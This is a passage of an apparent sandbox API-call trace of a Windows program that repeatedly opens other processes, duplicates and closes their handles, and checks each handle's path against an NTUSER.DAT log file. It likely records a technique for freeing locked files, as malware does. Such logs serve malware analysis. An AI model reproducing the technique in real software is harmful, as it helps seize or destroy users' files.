CloseHandle (hObject=0x62c) returned 1 [0153.161] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0153.161] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.161] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.162] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.162] CloseHandle (hObject=0x670) returned 1 [0153.162] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.162] CloseHandle (hObject=0x680) returned 1 [0153.162] CloseHandle (hObject=0x62c) returned 1 [0153.162] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0153.162] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.163] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.163] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.164] CloseHandle (hObject=0x670) returned 1 [0153.164] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.164] CloseHandle (hObject=0x680) returned 1 [0153.164] CloseHandle (hObject=0x62c) returned 1 [0153.164] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0153.164] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.164] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.165] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.165] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.165] CloseHandle (hObject=0x670) returned 1 [0153.165] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.165] CloseHandle (hObject=0x680) returned 1 [0153.165] CloseHandle (hObject=0x62c) returned 1 [0153.166] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0153.166] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.166] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.167] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.167] CloseHandle (hObject=0x670) returned 1 [0153.167] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.167] CloseHandle (hObject=0x680) returned 1 [0153.167] CloseHandle (hObject=0x62c) returned 1 [0153.167] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0153.167] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.168] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.168] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.168] CloseHandle (hObject=0x670) returned 1 [0153.168] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.168] CloseHandle (hObject=0x680) returned 1 [0153.169] CloseHandle (hObject=0x62c) returned 1 [0153.169] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0153.169] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.170] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.170] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.170] CloseHandle (hObject=0x670) returned 1 [0153.170] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.170] CloseHandle (hObject=0x680) returned 1 [0153.170] CloseHandle (hObject=0x62c) returned 1 [0153.170] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0153.170] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.171] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.172] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.172] CloseHandle (hObject=0x670) returned 1 [0153.172] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.172] CloseHandle (hObject=0x680) returned 1 [0153.172] CloseHandle (hObject=0x62c) returned 1 [0153.172] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0153.172] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.172] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.173] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.174] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.174] CloseHandle (hObject=0x670) returned 1 [0153.174] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0153.174] CloseHandle (hObject=0x680) returned 1 [0153.174] CloseHandle (hObject=0x62c) returned 1 [0153.174] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0153.174] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.175] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.176] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.176] CloseHandle (hObject=0x670) returned 1 [0153.176] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.176] CloseHandle (hObject=0x680) returned 1 [0153.176] CloseHandle (hObject=0x62c) returned 1 [0153.176] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7ac) returned 0x62c [0153.176] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.177] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.177] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.177] CloseHandle (hObject=0x670) returned 1 [0153.177] _wcsicmp (_Str1="\\Common Files", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0153.177] CloseHandle (hObject=0x680) returned 1 [0153.177] CloseHandle (hObject=0x62c) returned 1 [0153.177] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0153.178] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.178] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.179] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.179] CloseHandle (hObject=0x670) returned 1 [0153.179] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.179] CloseHandle (hObject=0x680) returned 1 [0153.179] CloseHandle (hObject=0x62c) returned 1 [0153.179] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x774) returned 0x62c [0153.179] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.180] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.180] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.181] CloseHandle (hObject=0x670) returned 1 [0153.181] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.181] CloseHandle (hObject=0x680) returned 1 [0153.181] CloseHandle (hObject=0x62c) returned 1 [0153.181] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0153.181] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.181] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.182] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.182] CloseHandle (hObject=0x670) returned 1 [0153.182] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.182] CloseHandle (hObject=0x680) returned 1 [0153.182] CloseHandle (hObject=0x62c) returned 1 [0153.182] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0153.182] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.183] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.183] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.184] CloseHandle (hObject=0x670) returned 1 [0153.184] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.184] CloseHandle (hObject=0x680) returned 1 [0153.184] CloseHandle (hObject=0x62c) returned 1 [0153.184] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0153.184] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.184] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.184] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.185] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.185] CloseHandle (hObject=0x670) returned 1 [0153.185] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.185] CloseHandle (hObject=0x680) returned 1 [0153.185] CloseHandle (hObject=0x62c) returned 1 [0153.185] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0153.185] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.185] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.186] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.186] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.187] CloseHandle (hObject=0x670) returned 1 [0153.187] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.187] CloseHandle (hObject=0x680) returned 1 [0153.187] CloseHandle (hObject=0x62c) returned 1 [0153.187] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0153.187] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.187] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.188] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.188] CloseHandle (hObject=0x670) returned 1 [0153.188] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.188] CloseHandle (hObject=0x680) returned 1 [0153.188] CloseHandle (hObject=0x62c) returned 1 [0153.188] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0153.188] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.189] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.190] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.190] CloseHandle (hObject=0x670) returned 1 [0153.190] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.190] CloseHandle (hObject=0x680) returned 1 [0153.190] CloseHandle (hObject=0x62c) returned 1 [0153.190] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0153.190] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.190] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.191] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.192] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.192] CloseHandle (hObject=0x670) returned 1 [0153.192] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.192] CloseHandle (hObject=0x680) returned 1 [0153.192] CloseHandle (hObject=0x62c) returned 1 [0153.192] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0153.192] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.192] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.193] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.194] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.194] CloseHandle (hObject=0x670) returned 1 [0153.194] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.194] CloseHandle (hObject=0x680) returned 1 [0153.194] CloseHandle (hObject=0x62c) returned 1 [0153.194] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0153.194] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.194] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.195] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.196] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.196] CloseHandle (hObject=0x670) returned 1 [0153.196] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.196] CloseHandle (hObject=0x680) returned 1 [0153.196] CloseHandle (hObject=0x62c) returned 1 [0153.196] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0153.196] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.197] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.198] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.198] CloseHandle (hObject=0x670) returned 1 [0153.198] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.198] CloseHandle (hObject=0x680) returned 1 [0153.198] CloseHandle (hObject=0x62c) returned 1 [0153.198] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0153.198] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.199] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.200] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.200] CloseHandle (hObject=0x670) returned 1 [0153.200] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.200] CloseHandle (hObject=0x680) returned 1 [0153.200] CloseHandle (hObject=0x62c) returned 1 [0153.200] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0153.200] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.201] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.202] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.202] CloseHandle (hObject=0x670) returned 1 [0153.202] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.202] CloseHandle (hObject=0x680) returned 1 [0153.202] CloseHandle (hObject=0x62c) returned 1 [0153.202] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0153.202] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.202] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.203] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.203] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.203] CloseHandle (hObject=0x670) returned 1 [0153.203] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.203] CloseHandle (hObject=0x680) returned 1 [0153.204] CloseHandle (hObject=0x62c) returned 1 [0153.204] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0153.204] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.204] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.205] GetExitCodeThread (in: 